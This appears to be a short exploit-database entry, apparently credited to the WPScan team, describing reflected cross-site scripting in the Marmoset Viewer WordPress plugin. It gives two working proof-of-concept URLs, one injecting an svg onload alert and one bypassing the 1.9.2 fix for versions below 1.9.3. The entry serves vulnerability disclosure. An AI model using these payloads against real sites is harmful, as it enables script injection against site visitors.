Share 
## https://sploitus.com/exploit?id=WPEX-ID:D11B79A3-F762-49AB-B7C8-3174624D7638
https://example.com/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://%3C/script%3E%3Csvg/onload=alert(1)%3E

(WPScanTeam) Reporter mentioned issue fixed in 1.9.2, but there was a bypass

v < 1.9.3
https://example.com/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/XSS/);marmoset.embed(%27a